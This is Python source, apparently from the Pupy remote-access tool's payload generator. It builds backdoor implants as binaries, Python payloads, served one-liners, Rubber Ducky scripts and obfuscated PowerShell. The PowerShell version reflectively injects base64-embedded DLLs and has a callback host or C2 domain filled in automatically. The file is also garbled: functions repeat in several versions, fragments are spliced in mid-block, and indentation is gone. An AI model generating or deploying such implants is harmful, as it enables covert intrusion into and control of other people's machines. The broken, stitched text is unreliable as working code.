def getInvokeReflectivePEInjectionWithDLLEmbedded(payload_conf):
'''
Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded
Ready for executing
'''
SPLIT_SIZE = 100000
x86InitCode, x86ConcatCode = "", ""
code = """
$PEBytes = ""
{0}
$PEBytesTotal = [System.Convert]::FromBase64String({1})
Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
"""#{1}=x86dll
binaryX86 = b64encode(
generate_binary_from_template(payload_conf,
'windows',
arch='x86',
shared=True)[0])
binaryX86parts = [
binaryX86[i:i + SPLIT_SIZE]
for i in range(0, len(binaryX86), SPLIT_SIZE)
]
for i, aPart in enumerate(binaryX86parts):
x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i, aPart)
x86ConcatCode += "$PEBytes{0}+".format(i)
print(
colorize("[+] ", "green") +
"X86 pupy dll loaded and {0} variables generated".format(i + 1))
script = obfuscatePowershellScript(
open(
os.path.join(ROOT, "external", "PowerSploit", "CodeExecution",
"Invoke-ReflectivePEInjection.ps1"), 'r').read())
return obfs_ps_script("{0}\n{1}".format(
script, code.format(x86InitCode, x86ConcatCode[:-1])))
def getInvokeReflectivePEInjectionWithDLLEmbedded(payload_conf):
'''
Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded
Ready for executing
'''
SPLIT_SIZE = 100000
x86InitCode, x86ConcatCode = "", ""
code = """
$PEBytes = ""
{0}
$PEBytesTotal = [System.Convert]::FromBase64String({1})
Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
"""#{1}=x86dll
binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf))
binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)]
for i,aPart in enumerate(binaryX86parts):
x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
x86ConcatCode += "$PEBytes{0}+".format(i)
print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1))
script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1])))
def pupygen(args, config):
ok = colorize("[+] ","green")
if args.workdir:
os.chdir(args.workdir)
script_code=""
if args.scriptlet:
script_code=parse_scriptlets(args.scriptlet, debug=args.debug_scriptlets)
l = launchers[args.launcher]()
while True:
try:
l.parse_args(args.launcher_args)
except LauncherError as e:
if str(e).strip().endswith("--host is required") and not "--host" in args.launcher_args:
myip = get_listener_ip(external=args.prefer_external, config=config)
if not myip:
raise ValueError("--host parameter missing and couldn't find your local IP. "
"You must precise an ip or a fqdn manually")
myport = get_listener_port(config, external=args.prefer_external)
print(colorize("[!] required argument missing, automatically adding parameter "
"--host {}:{} from local or external ip address".format(myip, myport),"grey"))
args.launcher_args = [
'--host', '{}:{}'.format(myip, myport), '-t', config.get('pupyd', 'transport')
]
elif str(e).strip().endswith('--domain is required') and not '--domain' in args.launcher_args:
domain = config.get('pupyd', 'dnscnc').split(':')[0]
if not domain or '.' not in domain:
print(colorize('[!] DNSCNC disabled!', 'red'))
return
print(colorize("[!] required argument missing, automatically adding parameter "
"--domain {} from configuration file".format(domain),"grey"))
args.launcher_args = [
'--domain', domain
]
else:
l.arg_parser.print_usage()
return
else:
break
if args.randomize_hash:
script_code+="\n#%s\n"%''.join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(40))
conf={}
conf['launcher']=args.launcher
conf['launcher_args']=args.launcher_args
conf['offline_script']=script_code
conf['debug']=args.debug
outpath=args.output
if args.format=="client":
print ok+"Generate client: {}/{}".format(args.os, args.arch)
data, filename, makex = generate_binary_from_template(
conf, args.os,
arch=args.arch, shared=args.shared, debug=args.debug
)
if not outpath:
template, ext = filename.rsplit('.', 1)
outfile = tempfile.NamedTemporaryFile(
dir=args.output_dir or '.',
prefix=template+'.',
suffix='.'+ext,
delete=False
)
else:
try:
os.unlink(outpath)
except:
pass
outfile = open(outpath, 'w+b')
outfile.write(data)
outfile.close()
if makex:
os.chmod(outfile.name, 0511)
outpath = outfile.name
elif args.format=="py" or args.format=="pyinst":
linux_modules = ""
if not outpath:
outfile = tempfile.NamedTemporaryFile(
dir=args.output_dir or '.',
prefix='pupy_',
suffix='.py',
delete=False
)
else:
try:
os.unlink(outpath)
except:
pass
outfile = open(outpath, 'w+b')
if args.format=="pyinst" :
linux_modules = getLinuxImportedModules()
packed_payload=pack_py_payload(get_raw_conf(conf, verbose=True))
outfile.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+linux_modules+"\n"+packed_payload)
outfile.close()
outpath = outfile.name
elif args.format=="py_oneliner":
packed_payload=pack_py_payload(get_raw_conf(conf, verbose=True))
i=conf["launcher_args"].index("--host")+1
link_ip=conf["launcher_args"][i].split(":",1)[0]
serve_payload(packed_payload, link_ip=link_ip, port=args.oneliner_listen_port)
elif args.format=="ps1":
SPLIT_SIZE = 100000
x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", ""
if not outpath:
outfile = tempfile.NamedTemporaryFile(
dir=args.output_dir or '.',
prefix='pupy_',
suffix='.ps1',
delete=False
)
else:
try:
os.unlink(outpath)
except:
pass
outfile = open(outpath, 'w+b')
outpath = outfile.name
code = """
$PEBytes = ""
if ([IntPtr]::size -eq 4){{
{0}
$PEBytesTotal = [System.Convert]::FromBase64String({1})
}}
else{{
{2}
$PEBytesTotal = [System.Convert]::FromBase64String({3})
}}
Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
"""#{1}=x86dll, {3}=x64dll
binaryX64 = base64.b64encode(generate_binary_from_template(conf, 'windows', arch='x64', shared=True)[0])
binaryX86 = base64.b64encode(generate_binary_from_template(conf, 'windows', arch='x86', shared=True)[0])
binaryX64parts = [binaryX64[i:i+SPLIT_SIZE] for i in range(0, len(binaryX64), SPLIT_SIZE)]
binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)]
for i,aPart in enumerate(binaryX86parts):
x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
x86ConcatCode += "$PEBytes{0}+".format(i)
print(ok+"X86 dll loaded and {0} variables used".format(i+1))
for i,aPart in enumerate(binaryX64parts):
x64InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
x64ConcatCode += "$PEBytes{0}+".format(i)
print(ok+"X64 dll loaded and {0} variables used".format(i+1))
script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
outfile.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) ))
outfile.close()
elif args.format=="ps1_oneliner":
from pupylib.payloads.ps1_oneliner import serve_ps1_payload
link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
if args.no_use_proxy == True:
serve_ps1_payload(conf, link_ip=link_ip, port=args.oneliner_listen_port, useTargetProxy=False)
else:
serve_ps1_payload(conf, link_ip=link_ip, port=args.oneliner_listen_port, useTargetProxy=True)
elif args.format=="rubber_ducky":
rubber_ducky(conf).generateAllForOStarget()
else:
raise ValueError("Type %s is invalid."%(args.format))
print(ok+"OUTPUT_PATH = %s"%os.path.abspath(outpath))
print(ok+"SCRIPTLETS = %s"%args.scriptlet)
print(ok+"DEBUG = %s"%args.debug)
return os.path.abspath(outpath)
def pupygen(args, config):
ok = colorize("[+] ", "green")
if args.workdir:
os.chdir(args.workdir)
script_code = ""
if args.scriptlet:
script_code = parse_scriptlets(args.scriptlet,
debug=args.debug_scriptlets)
l = launchers[args.launcher]()
while True:
try:
l.parse_args(args.launcher_args)
except LauncherError as e:
if str(e).strip().endswith(
"--host is required"
) and not "--host" in args.launcher_args:
myip = get_listener_ip(external=args.prefer_external,
config=config)
if not myip:
raise ValueError(
"--host parameter missing and couldn't find your local IP. "
"You must precise an ip or a fqdn manually")
myport = get_listener_port(config,
external=args.prefer_external)
print(
colorize(
"[!] required argument missing, automatically adding parameter "
"--host {}:{} from local or external ip address".
format(myip, myport), "grey"))
args.launcher_args = [
'--host', '{}:{}'.format(myip, myport), '-t',
config.get('pupyd', 'transport')
]
elif str(e).strip().endswith(
'--domain is required'
) and not '--domain' in args.launcher_args:
domain = config.get('pupyd', 'dnscnc').split(':')[0]
if not domain or '.' not in domain:
print(colorize('[!] DNSCNC disabled!', 'red'))
return
print(
colorize(
"[!] required argument missing, automatically adding parameter "
"--domain {} from configuration file".format(domain),
"grey"))
args.launcher_args = ['--domain', domain]
else:
l.arg_parser.print_usage()
return
else:
break
if args.randomize_hash:
script_code += "\n#%s\n" % ''.join(
random.choice(string.ascii_uppercase + string.digits +
string.ascii_lowercase) for _ in range(40))
conf = {}
conf['launcher'] = args.launcher
conf['launcher_args'] = args.launcher_args
conf['offline_script'] = script_code
conf['debug'] = args.debug
outpath = args.output
if args.format == "client":
print ok + "Generate client: {}/{}".format(args.os, args.arch)
data, filename, makex = generate_binary_from_template(
conf,
args.os,
arch=args.arch,
shared=args.shared,
debug=args.debug)
if not outpath:
template, ext = filename.rsplit('.', 1)
outfile = tempfile.NamedTemporaryFile(dir=args.output_dir or '.',
prefix=template + '.',
suffix='.' + ext,
delete=False)
else:
outfile = open(outpath, 'w+b')
outfile.write(data)
outfile.close()
if makex:
os.chmod(outfile.name, 0511)
outpath = outfile.name
elif args.format == "py" or args.format == "pyinst":
linux_modules = ""
if not outpath:
outfile = tempfile.NamedTemporaryFile(dir=args.output_dir or '.',
prefix='pupy',
suffix='.py',
delete=False)
else:
outfile = open(outpath, 'w+b')
if args.format == "pyinst":
linux_modules = getLinuxImportedModules()
packed_payload = pack_py_payload(get_raw_conf(conf))
outfile.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n" +
linux_modules + "\n" + packed_payload)
outfile.close()
outpath = outfile.name
elif args.format == "py_oneliner":
packed_payload = pack_py_payload(get_raw_conf(conf))
i = conf["launcher_args"].index("--host") + 1
link_ip = conf["launcher_args"][i].split(":", 1)[0]
serve_payload(packed_payload,
link_ip=link_ip,
port=args.oneliner_listen_port)
elif args.format == "ps1":
SPLIT_SIZE = 100000
x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", ""
if not outpath:
outfile = tempfile.NamedTemporaryFile(dir=args.output_dir or '.',
prefix='pupy',
suffix='.ps1',
delete=False)
else:
outfile = open(outpath, 'w+b')
outpath = outfile.name
code = """
$PEBytes = ""
if ([IntPtr]::size -eq 4){{
{0}
$PEBytesTotal = [System.Convert]::FromBase64String({1})
}}
else{{
{2}
$PEBytesTotal = [System.Convert]::FromBase64String({3})
}}
Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
"""#{1}=x86dll, {3}=x64dll
binaryX64 = base64.b64encode(
generate_binary_from_template(conf,
'windows',
arch='x64',
shared=True)[0])
binaryX86 = base64.b64encode(
generate_binary_from_template(conf,
'windows',
arch='x86',
shared=True)[0])
binaryX64parts = [
binaryX64[i:i + SPLIT_SIZE]
for i in range(0, len(binaryX64), SPLIT_SIZE)
]
binaryX86parts = [
binaryX86[i:i + SPLIT_SIZE]
for i in range(0, len(binaryX86), SPLIT_SIZE)
]
for i, aPart in enumerate(binaryX86parts):
x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i, aPart)
x86ConcatCode += "$PEBytes{0}+".format(i)
print(ok + "X86 dll loaded and {0} variables used".format(i + 1))
for i, aPart in enumerate(binaryX64parts):
x64InitCode += "$PEBytes{0}=\"{1}\"\n".format(i, aPart)
x64ConcatCode += "$PEBytes{0}+".format(i)
print(ok + "X64 dll loaded and {0} variables used".format(i + 1))
script = obfuscatePowershellScript(
open(
os.path.join(ROOT, "external", "PowerSploit", "CodeExecution",
"Invoke-ReflectivePEInjection.ps1"), 'r').read())
outfile.write("{0}\n{1}".format(
script,
code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode,
x64ConcatCode[:-1])))
outfile.close()
elif args.format == "ps1_oneliner":
from pupylib.payloads.ps1_oneliner import serve_ps1_payload
link_ip = conf["launcher_args"][conf["launcher_args"].index("--host") +
1].split(":", 1)[0]
if args.no_use_proxy == True:
serve_ps1_payload(conf,
link_ip=link_ip,
port=args.oneliner_listen_port,
useTargetProxy=False)
else:
serve_ps1_payload(conf,
link_ip=link_ip,
port=args.oneliner_listen_port,
useTargetProxy=True)
elif args.format == "rubber_ducky":
rubber_ducky(conf).generateAllForOStarget()
else:
raise ValueError("Type %s is invalid." % (args.format))
print(ok + "OUTPUT_PATH = %s" % os.path.abspath(outpath))
print(ok + "SCRIPTLETS = %s" % args.scriptlet)
print(ok + "DEBUG = %s" % args.debug)
return os.path.abspath(outpath)
}}
Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR
"""#{1}=x86dll, {3}=x64dll
binaryX64=base64.b64encode(get_edit_pupyx64_dll(conf))
binaryX86=base64.b64encode(get_edit_pupyx86_dll(conf))
binaryX64parts = [binaryX64[i:i+SPLIT_SIZE] for i in range(0, len(binaryX64), SPLIT_SIZE)]
binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)]
for i,aPart in enumerate(binaryX86parts):
x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
x86ConcatCode += "$PEBytes{0}+".format(i)
print(colorize("[+] ","green")+"X86 dll loaded and {0} variables used".format(i+1))
for i,aPart in enumerate(binaryX64parts):
x64InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart)
x64ConcatCode += "$PEBytes{0}+".format(i)
print(colorize("[+] ","green")+"X64 dll loaded and {0} variables used".format(i+1))
script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read())
with open(outpath, 'wb') as w:
w.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) ))
elif args.format=="ps1_oneliner":
from pupylib.payloads.ps1_oneliner import serve_ps1_payload
link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
if args.no_use_proxy == True:
serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=False)
else:
serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=True)
elif args.format=="rubber_ducky":
rubber_ducky(conf).generateAllForOStarget()
else:
exit("Type %s is invalid."%(args.format))
print(colorize("[+] ","green")+"payload successfully generated with config :")
print("OUTPUT_PATH = %s"%os.path.abspath(outpath))
for i in range(0, len(binaryX86), SPLIT_SIZE)
]
for i, aPart in enumerate(binaryX86parts):
x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i, aPart)
x86ConcatCode += "$PEBytes{0}+".format(i)
print(
colorize("[+] ", "green") +
"X86 dll loaded and {0} variables used".format(i + 1))
for i, aPart in enumerate(binaryX64parts):
x64InitCode += "$PEBytes{0}=\"{1}\"\n".format(i, aPart)
x64ConcatCode += "$PEBytes{0}+".format(i)
print(
colorize("[+] ", "green") +
"X64 dll loaded and {0} variables used".format(i + 1))
script = obfuscatePowershellScript(
open(
os.path.join(ROOT, "external", "PowerSploit", "CodeExecution",
"Invoke-ReflectivePEInjection.ps1"), 'r').read())
with open(outpath, 'wb') as w:
w.write("{0}\n{1}".format(
script,
code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode,
x64ConcatCode[:-1])))
elif args.format == "ps1_oneliner":
from pupylib.payloads.ps1_oneliner import serve_ps1_payload
i = conf["launcher_args"].index("--host") + 1
link_ip = conf["launcher_args"][i].split(":", 1)[0]
serve_ps1_payload(conf, link_ip=link_ip)
elif args.format == "rubber_ducky":
rubber_ducky(conf).generateAllForOStarget()
else:
exit("Type %s is invalid." % (args.format))